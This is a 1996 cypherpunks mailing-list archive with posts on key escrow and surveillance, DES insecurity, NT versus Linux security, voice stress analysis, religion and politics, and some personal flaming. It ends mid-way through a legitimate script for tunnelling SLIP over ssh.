>     means and results --it does provide an early point of intercepting
>     behavioral patterns with the *parent* being the judge and warder,
>     and hopefully give those parents a wakeup call they need to guide
>     their children as they are fast approaching adulthood where they
>     are fully accountable.

     Mr. May's usage of "state" means "governing body" rather than "state of
the union". But you knew that. There are many other "interception" points 
that can be utilized to identify children whose parents are not providing 
them with the state approved ideological underpinings, Let's take a look 
at some shall we? 

     Your children do well in school correct? Straight A's in most classes? 
it is obvious that you are driving your children too hard, teaching them tp
be overacheivers. You shouldn't push them so hard, they should stay at the 
level of their classmates. 

     Ok, that was hyperbole. Seriously tho', if you talk to many "social 
workers" <pardon me--*spit*> they can give you certain behavior patterns that
indicate a child is being abused in the home. They could (and I am sure some 
would like to) go so far as to include certain types of religious and political
indoctrination as abuse. 

     If the state (city/county) mandates it, and it gives the apperance of 
"stopping crime", or simply provides a smooth surface, is it worth it? 

         alcohol is available at any large grocery store; it has not been
>     banned to any extent since prohibition, but not necessarily avail-
>     able in rural areas.  

    Not in your area, and maybe not my LDS's, but try Pell City Alabama.
Same mentality, different name on the church house door. 

>         I do not think you can prohibit anything from adults --drugs,

     Can, or should? Let _me_ run the DEA, and give me a good budget, and 
I will stop it. Yeah, people will die, but they are dying anyway. 

>         certainly we are justified in ranting against any abridgement of 
>     our right to freely (and privately) communicate, freedom of 
>     *peaceful* assembly, a truly free press --certainly not the New 
>     World Order blinded press printing the official line dictated by
>     political/economic Boss Tweeds of what is effectively an oligarchy 
>     --they do not possess common principles sufficient to even be
>     called 'national socialists' (fascists). 

     Yet you argue for the abridgement of freedoms based on age. Does the 
state know better than a parent when a minor is old enough to be out after
midnight?

>         or, there is a government like Washington where they are trying
>     to, and may anyway, implement President Hillary's "It takes a 
>     Global Village" so the state can dictate everything and raise a new
>     generation of robots in the mold of their revisionist history which
>     we are now suffering by attrition....   

     Which really only pisses most people off because it is a different
revisionist history than they want taught. 

>         If Bubba and the President are reelected with a Democratic 
>     Congress, we will not recognize our once almost free country in

     Or, he will push too far, too fast, and it will snap back in his face.

     Remember, Klinton can't do it without congressional approval. 


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Sun, 6 Oct 1996 19:08:22 +0800
To: jfricker@vertexgroup.com (John Fricker)
Subject: Re: WINDOWS NT ????
In-Reply-To: <19961005002433046.AAA82@dev.vertexgroup.com>
Message-ID: <199610060628.BAA00310@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text


> An NT machine running off the shelf protocols and services is certainly mor=
> e secure than your average linux install. Of course clueless administrators=
>  for either (any) platform can leave the door wide open easily enough.=20

     How about an "average" NT install versus a "average" linux install? 

     Neither of my machines are all that secure, but they don't have to 
be right now. Neither has more than 5 users, all of whom I either trust 
personally, or don't know enough to do anything. On the other hand, I 
would be willing to bet that Mr. Metzger, or adamsc (sorry, I forgot your
full name) could lock a linux box down as tight as a networked NT machine.

    Hell, I'd bet 20 bucks I could. The machine wouldn't DO a whole lot,
but it would be tough to break into. (basically, don't run telnetd, ftpd,
sendmail, run sshd for incoming/outgoing connections, use a secure httpd
IF NECESSARY, NO NFS, shadow passwords etc.) 

> But what do you mean by secure?

     Safe from undesired intrusion.

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "I~nigo Gonzalez" <nexus@adv.es>
Date: Tue, 8 Oct 1996 11:03:10 +0800
To: cypherpunks@toad.com
Subject: Did Jesus masturbate ?
Message-ID: <3256F923.59A1@adv.es>
MIME-Version: 1.0
Content-Type: text/plain


Yes, you guessed right: the Subject came from alt.2600
famous line noise thread....

About Utah, Mormons, Religion /etc... Is someone mailing
ciphertext to the list in the form of Noise ????

Please use _plaintext_ or just learn Crypto.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jonathon <grafolog@netcom.com>
Date: Sun, 6 Oct 1996 13:19:10 +0800
To: Anonymous <amnesia@chardos.connix.com>
Subject: Re: anonymous oddsman
In-Reply-To: <199610051932.PAA10053@chardos.connix.com>
Message-ID: <Pine.SUN.3.95.961006022511.1084A-100000@netcom2>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 5 Oct 1996, Anonymous wrote:

> "Demeaning the integrity of the U.S. Presidential election process
> for you on a regular basis, at no charge."

	There is no way to demean the integrity of an election
	process that has no integrity, no ethics, and 
	relies on nothing more than brute force. Maybe it
	would be more precise to say it relies on nothing
	more than who can play the best shell game.   

	Jim Bell's solution would be a vast improvement.

	Patience is a virtue,
		Virtue is a grace.
			Grace is a little girl,
				Who did not wash her face.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 6 Oct 1996 18:05:15 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: legality of wiretapping: a "key" distinction
In-Reply-To: <199610060343.UAA03820@netcom21.netcom.com>
Message-ID: <Pine.SUN.3.94.961006034458.13831A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 5 Oct 1996, Vladimir Z. Nuri wrote:

> 
> [wiretapping involves total secrecy vs. warrants]
> >This is hardly news.  An old and inconsequential distinction
> >unfortunately.
> 
> please elaborate.

Do your own homework or pay me.

[...]

> >Do not make the mistake of thinking there is no case law on wiretap simply
> >because you have not/are too lazy to go to the library and look it up.
> 
> I said, "at least it is rarely quoted here", lawyer-boy.

Look at your quote again.  You indicated there was no case law, or that it
never appeared here.  I suppose this is where someone with a real job is
supposed to take hours out of his or her time to type up a 10 page summary
of why you are a complete fool.  Sorry, I'm not biting.

> >You propose to refight a case soundly resolved ages ago and you propose to
> >get the rest of the list to do your homework for you.
> 
> nevertheless, you might not come off as so utterly condescending
> and self-pretentious if you gave even the slightest smidgeon
> of a reference yourself, instead of preferring to insult a poster.

I am insulting a lazy poster.  Do your own work for a change.  You
deserved every bit of condescending and (self) pretentious ire I had to
spill.

> >I propose you go to the library and do your own work for a change.
> 
> I propose you try to show some civility in cyberspace for a change.

This from you?  Please.

> >I wonder what caused you to think this was some kind of novel revelation.
> 
> I wonder why you always revert to sarcasm instead of making
> constructive points.

Reason seems to have long since ceased to be useful in your case, "Vlad."

> >I know you think you're being very clever and original, as if somehow you
> >aquired the skills of a noted constitutional scholar whilest no one was
> >looking. I also know that you have not bothered to research your own
> >claims.
> 
> there are no claims, merely ideas as usual. I am not posting to 
> show off my pretentious laywer skills. the cpunks have you for that.

I accept that honor with pride.  As for claims or ideas, I stand
corrected.  I now believe you present neither.

> >I can't decide, however, if this is cleverness on your part in
> >trying to get someone else to do all your work for you, in which case it's
> >not working on me, or simple laziness, in which case it's apparent and
> >unsurprising.
> 
> "your work"? apparently it is "my work" to research case law involving
> wiretapping now? hmmmmm, my job description must've changed again
> while I wasn't looking. @#$%%^&* don't you hate it when that happens!!

It is generally the expectation that he who is presenting a supposed new
and novel idea support it him or herself.  You have failed to do so mostly
because you are content to rely on everyone else to flush out your
"arguments" for you.  I'm sorry if you feel supporting your own claims or
justifing the intellectual expenditures others might make in pursuing an
idea you present is a new facet of your "job description."  The fact is
that your ideas would have never escaped your fingertips if you had spent
a mere ten or twenty minutes bothering to get some background on the
amazingly useless idea you proposed.  That's insulting to everyone here.

> Unicorn, instead of posting something that is so utterly devoid of
> any informational value, and merely tries to invent new and clever
> ways of tangentially, scurrilously insulting someone without directly
> addressing a single actual point
> involved.

How my refusal to spend an hour or more typing in the text of the 30
opinions it would take to finally get you to shut up (probably because
some new lunacy attracted your attention instead) is anything but
reasonable given the total lack of effort on your part to even have a
clue about the topic on which you propose to lead, is beyond me.  In case
you missed it the first time, my post is utterly devoid of informational
value by design.

> why don't you do the obvious and use the
> post as a leaping off point to show off your own mastery of the
> arcania and minutia of our legal system, such as it was intended?

Because given the topic you have brought up, my using your idea as a
"leaping off point" to demonstrate any legal knowledge would be akin to
factoring the number 6 to demonstrate my mastery of math.

> do you really think you are getting reputation brownie points or
> something by doing this? hee, hee.

No, I think I am destroying your reputation brownie points (if any
existed) as well as those attached to this idiotic thread.

Another poster discussed (quite well) the legal reasons your ideas were
moronic.  I think perhaps he had more time on his hands.

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 6 Oct 1996 18:01:42 +0800
To: jim bell <jimbell@pacifier.com>
Subject: The Great Reducer: Line of the Year
In-Reply-To: <199610060111.SAA07880@mail.pacifier.com>
Message-ID: <Pine.SUN.3.94.961006040618.13831B-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain



This is, without question, going in my alltime archive.

On Sat, 5 Oct 1996, jim bell wrote:

[...]

> You're ENTIRELY misunderstanding (or misrepresenting) what I'm saying!  I'm 
> well aware that the SC disagrees, but that is simply because they are 
> entirely wrong in this matter.

[...]

> 
> Jim Bell
> jimbell@pacifier.com
> 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: VaX#n8 <vax@linkdead.paranoia.com>
Date: Sun, 6 Oct 1996 19:12:17 +0800
To: roy@scytale.com
Subject: Re: encrypting pppd?
In-Reply-To: <961002.235706.1R8.rnr.w165w@sendai.scytale.com>
Message-ID: <199610060919.EAA03227@linkdead.paranoia.com>
MIME-Version: 1.0
Content-Type: text/plain


In message <961002.235706.1R8.rnr.w165w@sendai.scytale.com>, Roy M. Silvernail 
writes:
>What threat model does this address?

snooping the link

>It'd be link encryption, where the
>best security is found in end-to-end encryption.

Encrypting at higher levels involves a different effort/cost
tradeoff that doesn't do much better at addressing the threat
mentioned above.  AFAIK, application-level involves modification
of every app we are interested in, and network or transport level
should probably best wait for IPv6.  I think link-layer is best
for what we need.

Come to think of it I've never seen papers on this kind of issue,
probably because I haven't looked.  Anyone got any URLs/bibliorefs
to a paper on the benefits of encryption or authentication at the
different levels of the OSI or other network models?

Thinking about it a bit more, if you only encrypt, say, telnet
then you've got a pretty predictable plaintext stream.  If you
encrypt the entire link level properly then it might be much harder
to isolate the nonvariant bits of the protocols since the port and
that kind of header info is not available to the attacker at that
level.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Mon, 7 Oct 1996 00:41:14 +0800
To: Adamsc <Adamsc@io-online.com>
Subject: Re: Can we kill single DES?
In-Reply-To: <19961004020539265.AAB223@GIGANTE>
Message-ID: <Pine.SUN.3.91.961006074541.3902B-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 2 Oct 1996, Adamsc wrote:

> >1. Is this a good idea? What will happen if DES becomes perceived
> >    as insecure?
> 
> That's Declan's department (and other non-clueless journalists - declan is
> just the most visible).   If it get's widespread and the target is something
> like Digicash, it'd get picked up by the Crime/Snoozeweek crowd.

This is the meme I've been trying to spread -- that 56-bit DES is *not*
secure. This cuts through all the rhetoric about differences between key
recovery and key escrow, who's going to be in this industry alliance, etc. 

Bottom line: it sucks; your data are insecure; don't use it. That 
argument is one jlists can understand.

And I think I've been successful. Tomorrow's issue of a popular
newsmagazine may mention just this.

-Declan


// declan@eff.org // I do not represent the EFF // declan@well.com //





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 6 Oct 1996 21:57:14 +0800
To: cypherpunks@toad.com
Subject: SRC_rip
Message-ID: <1.5.4.16.19961006120416.2a27bbf8@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


     10-7-96. NYP:

     "Seymour Cray, Computer Industry Pioneer and Father of the
     Supercomputer, Dies at 71." Markoff

          "I was fortunate in having an instructor at the
          University of Minnesota who was looking after me in the
          sense that when I said, 'What's next?' he said, 'If I
          were you, I'd just go down the street here to
          Engineering Research Associates, and I'd think you'd
          like what they're doing there." The company was doing
          contract work for the Navy in cryptography. Mr. Cray's
          first supercomputers permitted researchers to crack
          enemy codes.

     -----

     http://jya.com/srcrip.txt  (13 kb)

     ftp://jya.com/pub/incoming/srcrip.txt

     SRC_rip







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Mon, 7 Oct 1996 01:21:56 +0800
To: Troy Varange <varange@crl.com>
Subject: Re: FUCK!!!!!!;-)
In-Reply-To: <199610050310.AA01791@crl5.crl.com>
Message-ID: <Pine.SUN.3.91.961006082035.3902E-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


Will is hardly a "media monopoly" representive, or someone who spits out 
"ADS as news."

If his longtime reading of the cypherpunks mailing list wasn't a good 
enough clue, you may remember that Will broke the Clipper III story 
earlier this year.

And yes, I am a card-carrying member of the media -- and a fan of Will's 
writing.

-Declan

HotWired
Washington, DC


On Fri, 4 Oct 1996, Troy Varange wrote:

> > >Or maybe this journalist, like most, doesn't know what the fuck he's
> > >talking about?
> > 
> > To which this card-carrying member of the media replies:
> > 
> > Companies cited in the PRESS RELEASE - that means public relations product,
> > not journalism product - were involved in signing off on what went into the
> > release. By definition, no member of the press was involved in producing
> > this document
> > 
> > It seems directing questions to the companies would be a good idea.
> > 
> > Will Rodger
> > Washington Bureau Chief
> > Interactive Week.
> 
> You media monopoly asswipes love corporate press releases because
> your too cheap to hire real journalists.
> 
> Yes, there's a problem with publishing ADS as news.  Look at the 
> magazine shelfs and the newspapers for proof.
> 


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Mon, 7 Oct 1996 02:18:03 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Voice Stress Analysis of Debates?
In-Reply-To: <199610060428.VAA19939@mail.pacifier.com>
Message-ID: <3257DCF0.6CC0@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


jim bell wrote:
> At 04:01 PM 10/5/96 -0400, John Young wrote:
> >CMI provides crisis management services relating to "hot"
> >threats of violence, workplace violence prevention, and
> >post-incident crisis intervention. In addition, CMI provides
> >threat of violence and crisis response training,
> >psych-claims management assistance, and SCAN analysis, which
> >is a deception detection technique.

> This reminds me...   Years ago, somebody developed a technique called
> "Voice Stress Analysis," which was supposed to detect small variations
> in a person's voice in response to stress. Not exactly a lie-detector,
> but it was supposed to do nearly the same thing.   Does anybody plan
> to analyze the debates for stress?  Is there software to do this?
> (Tried to do a web-search; didn't see anything.)

Pardon me for butting in.  Some remailer says I post too much, and I 
should cut out some. They didn't say which posts I should cut out, tho'.

Anyway, as I understand it, the current technology in voice/stress 
analysis goes way beyond the polygraph at its best (current) level of 
technology.  There was at least one agency that did voice analysis 
during the Simpson debacle, and the results were (as I recall) very 
promising.  Apparently, a person who can beat a polygraph cannot beat a 
voice/stress analysis.

BTW, the rule for these debates (as all presidential discourse) is:
"He's lying."
"How can you tell?"
"His lips are moving."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Mon, 7 Oct 1996 02:51:22 +0800
To: cypherpunks@toad.com
Subject: "Drift net fishing," GAK, FBI, and NSA
Message-ID: <v03007802ae7da0d997c2@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



A couple of posters have talked about "drift net fishing" of
communications, where random stuff is sampled and intelligence items
gleaned. (I think it was Ernest Hua who cited the example in a Tom Clancy
book/movie.)

Perhaps, but let's go back to the discussions at the EPIC "SAFE" conference
in Palo Alto several months ago. Some convincing evidence was presented
that the moving force behind GAK is *not* the NSA, but is rather the *FBI*.

Specifically, even 40-bit keys are probably too long for massive "drift net
fishing," in that the cost per break is probably still too high. The cost
for a "focussed attack" (I can't think of a fishing parallel...maybe "spear
fishing"?) is of course low. The speaker at SAFE pointed out that the FBI
is pushing for the 40-bit keys (and now is accepting the 56-bit keys?)
because for focussed attacks, e.g., on the communications of a person under
observation, they can call on other agencies to break the ciphers for them
(even if they don't yet have their own such machines).

In a nutshell, almost any level of encryption above, say, 30something bits,
is too much when millions of messages per day are to be "drift-netted" is
too much. (The exact number that is "too much" depends on a lot of factors,
including the cost of the cipher-breaking machines, the number of messages
to be read per day, etc. This number will change with time.)

The FBI's interest may be changing, too. Their lead role in the TWA 800
investigation may have them sorely wanting "drift net" capabilities, as all
other leads are exhausted. If we see more of these sorts of terrorist
(maybe) incidents, it may be that more "drift net" capabilities are sought.

A note on _contact analysis_. One thing the FBI probably wants badly are
databases of who has travelled where, and when, for correlation analysis.
Note that the crackdown on "valid IDs" for travel, for airlines, helps in
this regard. I would not be surprised to learn that the airline databases
are routinely fed to the Feds, so to speak. (Possibly via the FAA, acting
as a kind of cutout.) Were I the head of the FBI, this is what I would
want.

The next step will be collecting hotel reservation databases. (Unlike the
case with the FAA and the airlines, I don't know what kind of authority
would grant them access to private hotel databases, but I expect they are
working to find such authority somewhere. Maybe the infinitely malleable
"regulation of commerce" clause, even if hotel stays are canonically _not_
interstate trade!)

(They already got access to the credit card databases, decades ago, of course.)

--Tim May

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael Peponis" <mianigand@[205.164.13.10]>
Date: Mon, 7 Oct 1996 00:09:56 +0800
To: cypherpunks@toad.com
Subject: Re: Missionaries (was: "Mormon Asshole?" re: GAK)
Message-ID: <199610061426.HAA14609@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> On Sat, 5 Oct 1996 15:55:42 -0700 (PDT), John C. Randolph wrote:
> 
> >What's really sad is the way that every cult member tries to convince
> >himself that *his* franchise has more to offer than Lifespring,
> 
> Food for thought:  suppose he didn't - why would any rational individual
> follow a religion he thought was wrong?

Simple, the average shuck does not have the backbone to stand up for 
something he/she thinks is full of garbage.

They would rather let the bullshit slide than to make an issue of it, 
and risk being ostersized or worse.

Peace and Tranqility are what people want, not truth(which is 
relative) and freedom(which is not).

I guess I should clarify the distiction.  Truth is subjective, there 
are many things I think are true, but I can't prove them beond a 
shadow af a doubt.

Absolute freedom is easy, it boils down to one simple question.  "Can 
I do what ever I want".  If the answer is yes, I am free, if the 
answer is no, I am not free.

-----------------------------------------------------------------------
I have no return e-mail, my ISP cut me off for violating community 
decency standards.  BOYCOT FACSIT ISP, BOYCOT COMMUNITIES DECENCY 
STANDARDS




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 7 Oct 1996 03:24:16 +0800
To: Dale Thorn <dthorn@gte.net>
Subject: Re: Voice Stress Analysis of Debates?
Message-ID: <199610061727.KAA18789@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:23 AM 10/6/96 -0700, Dale Thorn wrote:
>jim bell wrote:
>> This reminds me...   Years ago, somebody developed a technique called
>> "Voice Stress Analysis," which was supposed to detect small variations
>> in a person's voice in response to stress. Not exactly a lie-detector,
>> but it was supposed to do nearly the same thing.   Does anybody plan
>> to analyze the debates for stress?  Is there software to do this?
>> (Tried to do a web-search; didn't see anything.)
>
>Pardon me for butting in.  Some remailer says I post too much, and I 
>should cut out some. They didn't say which posts I should cut out, tho'.

Cryptography is, basically, the area of hidden meanings.  In a sense, a 
voice-stress analyzer is intended to seek out hidden meanings in a person's 
statements.  So I'd say it's as on-topic as most of the stuff 'round here.

>Anyway, as I understand it, the current technology in voice/stress 
>analysis goes way beyond the polygraph at its best (current) level of 
>technology.  There was at least one agency that did voice analysis 
>during the Simpson debacle, and the results were (as I recall) very 
>promising.  Apparently, a person who can beat a polygraph cannot beat a 
>voice/stress analysis.

One thing I wonder is this:  Can the stress indications be removed from a 
voice-containing signal by some sophisticated DSP processing?  Just look for 
whatever effect that indicates stress, add it in equal and negative amounts 
to eliminate the apparent stress, etc.    It might not make sense for 
anything less "critical" than debates, but if the control of the debates is 
as monopolized as we think it is, it is reasonable to think that debate 
participants would insist on a certain level of control over the audio signal.


>BTW, the rule for these debates (as all presidential discourse) is:
>"He's lying."
>"How can you tell?"
>"His lips are moving."

Well, I sorta assumed this.  But I would still be interested to get some 
kind of quantitative feedback on the debates.  If anything, the ABSENSE of 
the news media's attempting to use voice-stress analysis is telling.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Mon, 7 Oct 1996 02:45:48 +0800
To: attila@primenet.com
Subject: Re: "Mormon Asshole?" re: GAK
In-Reply-To: <199610050800.BAA00792@infowest.com>
Message-ID: <199610061602.LAA00820@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text


> In <199610041936.MAA29441@idiom.com>, on 10/04/96 
>    at 12:36 PM, "John C. Randolph" <jcr@idiom.com> said:
> -.I'm *really* not that specific!) The only time I feel any anti-mormon
> -."passion" is when I want to throttle one of your missionaries.  I like
> -.sleeping in, and being awakened by a kid who wants me to join a religion is
> -.really offensive.
>         come, come, John...   you would deny those bright, eager faces
>     of our missionaries, who spent several years earning the money to be
>     able to support themselves on a two year mission?

     Yes.  

>         It is not for our missionaries to ask you to join the Church; 
>     they are only to assist you in your _investigation_ of our Church.
>     Don't worry, I realize some overreach their mission authority with
>     their enthusiasm.  

     Making sure you get _their_ revisionist history, as opposed the 
other sides revisionist history.


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank Stuart <fstuart@vetmed.auburn.edu>
Date: Mon, 7 Oct 1996 02:30:24 +0800
To: cypherpunks@toad.com
Subject: Re: Sun's GAK position
Message-ID: <199610061639.LAA24356@snoopy.vetmed.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain


Bill Stewart (stewarts@ix.netcom.com) wrote:
[...]
>That's not looking for someone to do GAK work at Sun; that's just looking for
>someone to help Sun sell stuff to the Feds.  They've been doing secure
[...]

The two aren't mutually exclusive.  I suspect the government plans to buy
lots and lots of GAK'ed products that come out of this consortium.  Not only
will this sweeten the pot for otherwise reluctant companies, it will also
help make the products the defacto standard.

In any event, the things that caught my attention most were the date
(October 1), and the phrases "Export controls as they apply to encryption
and security products", and "Public policy issues of cryptography and Key
Escrow".

                          | (Douglas) Hofstadter's Law:
                          | It always takes longer than you expect, even 
Frank Stuart              | when you take into account Hofstadter's Law.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: matthew@itconsult.co.uk (Matthew Richardson)
Date: Sun, 6 Oct 1996 20:31:22 +0800
To: adamsc@io-online.com
Subject: RE: WINDOWS NT ????
In-Reply-To: <19961006044857578.AAA115@GIGANTE>
Message-ID: <memo.961006113953.230A@itconsult.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 05 Oct 1996 07:57:22 -0700, John Fricker wrote:
> Okay, correct me if I'm wrong on this (as if you wouldn't...):
> 1. Microsoft markets NT with C2 security
> 2. Numerous industry magazines report that you can bypass NTFS file 
> security by booting off of a diskette and using NTFSDOS.
> 3. Numerous industry magazines (and I believe MS finally mentioned it 
> in some routine status update) all say that NT should now be considered
> C2 *ONLY* on machines w/o floppy drives.

Microsoft only claim C2 security when the machine is physically secured 
and not attached to any network.  Specifically NTFS makes no claim of any 
encryption and can thus be read by non-NT software.

Best wishes,
Matthew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Mon, 7 Oct 1996 05:06:02 +0800
To: cypherpunks@toad.com
Subject: Re: RSA's Official Permission
In-Reply-To: <199610060521.WAA10181@dfw-ix1.ix.netcom.com>
Message-ID: <v03007803ae7dbbf4f60a@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:47 PM +0000 10/6/96, The Deviant wrote:
>On Sat, 5 Oct 1996, Bill Stewart wrote:
>
>> >   REDWOOD CITY, Calif.---Oct. 2nd, 1996--RSA Data Security, Inc., a
>> >   wholly-owned subsidiary of Security Dynamics Technologies, Inc.
>> >   (NASDAQ: SDTI), issued the following comments on the administration's
>> >   recent announcement of a Key Recovery Initiative:
>>         [rave reviews deleted....]
>>
>> I wonder how much being bought by SDT has influenced their positions?
>>
>
>presumably a very large amount, I seriously doubt if R, S, and A like
>supporting GAK.

Of the three, only Rivest has had any significant connection to RSADSI in
the last ten years or so. I heard from Diffie that Shamir's interest is
zero (such as that he sold his interest long ago). I don't know about
Adleman's interest, but I expect it is also minimal. Rivest has a
continuing role, of course, and has a sizable stock position.

As evidenced in the 10K-type documents John Gilmore pointed us to a few
months ago (the first public glimpse into the fincances of RSADSI), the
major stockholders are Addison Fisher (*), Jim Bidzos, and one or two
others.

(* Fisher--or it may be spelled "Fischer"--was once in the CIA,
interestingly, and has long had spook connections on contracts his company
works on. I had not realized he was a major RSADSI stockholder until the
10K documents were made public. You can draw your own conclusions, or not,
about NSA involvment in RSADSI. I don't know anything more than what I've
said here.)

--Tim

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 7 Oct 1996 05:35:05 +0800
To: "Timothy C. May" <cypherpunks@toad.com
Subject: Re: "Drift net fishing," GAK, FBI, and NSA
Message-ID: <199610061907.MAA23619@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:07 AM 10/6/96 -0800, Timothy C. May wrote:
>Some convincing evidence was presented
>that the moving force behind GAK is *not* the NSA, but is rather the *FBI*.
>Specifically, even 40-bit keys are probably too long for massive "drift net
>fishing," in that the cost per break is probably still too high. The cost
>for a "focussed attack" (I can't think of a fishing parallel...maybe "spear
>fishing"?) 

How about "DuPont-lure fishing"?

is of course low. The speaker at SAFE pointed out that the FBI
>is pushing for the 40-bit keys (and now is accepting the 56-bit keys?)
>because for focussed attacks, e.g., on the communications of a person under
>observation, they can call on other agencies to break the ciphers for them
>(even if they don't yet have their own such machines).
>
>In a nutshell, almost any level of encryption above, say, 30something bits,
>is too much when millions of messages per day are to be "drift-netted" is
>too much. (The exact number that is "too much" depends on a lot of factors,
>including the cost of the cipher-breaking machines, the number of messages
>to be read per day, etc. This number will change with time.)

You should also factor in the government's ability to store what they can't 
immediately decrypt, which drastically changes the playing field with 
regard to encryption.  It was at least five years ago when I first read 
about a system to record data on so-called "digital paper," which was 
actually a plastic with a photo-writable layer similar to write-once CD's.   
 It could be formed in any configuration, but perhaps one of the more 
intriguing (due to the large writable area) is on large reels similar to 
1/2" magtape.  As I recall, they claimed that such a reel could hold 1 
terabyte of data.

Sure, such a capacity is small compared with the total Internet traffic, but 
I assume that most traffic could be excluded from recording if its source 
was known, etc.  They'd exclude anything from "probably-okay" web pages, they'd 
trim space-hogging graphics, etc.  "Just the facts, ma'am."     Call the 
whole thing "retroactive-selective-drift-net-fishing," if you will.

Once this data is stored away the government would determine (perhaps years 
after the fact?) which data they want to decrypt, possibly based on crimes 
committed long after the data was recorded.  This information might reveal 
contacts, etc.   Obviously they have no prayer of doing real-time analysis.  
Even so, it makes it far more practical to do the equivalent of drift-net 
fishing if they can exclude 99.9999%+ of the traffic from their decryption 
attempts.  56-bit encryption doesn't look so ominous to them in this case.



Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew Ghio <ghio@myriad.alias.net>
Date: Mon, 7 Oct 1996 02:14:38 +0800
To: cypherpunks@toad.com
Subject: Re: encrypting pppd?
In-Reply-To: <199610021431.JAA02934@linkdead.paranoia.com>
Message-ID: <199610061634.MAA28522@myriad>
MIME-Version: 1.0
Content-Type: text/plain


Ian Goldberg <iang@cs.berkeley.edu> wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
>
> In article <961002.235706.1R8.rnr.w165w@sendai.scytale.com>,
> Roy M. Silvernail <roy@scytale.com> wrote:
> >In list.cypherpunks, vax@linkdead.paranoia.com writes:
> >
> >> Anyone worked on, or know of a freely available, one of these beasts?
> >
> >What threat model does this address?  It'd be link encryption, where the
> >best security is found in end-to-end encryption.
>
> pppd doesn't necessarily run over a modem; you can "tunnel" it over
> another IP connection.
>
> I have in fact done this very thing.  Use ssh to (encrypted) log in to
> the ppp server, and start pppd at each end.  It's been a while; I think
> I had to tweak something to make it work over a pty instead of a serial
> port.

Here's a little script for tunnelling SLIP over a ssh session on Linux:

(sleep 2;\
 /usr/local/bin/ssh -l username -e none remotehost</dev/ttyqe>&/dev/ttyqe)&
(echo "port ptyqe";\
 echo "wait ord: 15";\
 echo "send secretpw\\n";\
 echo "wait (shellprompt)> 60";\
 echo "send slip\\n";\
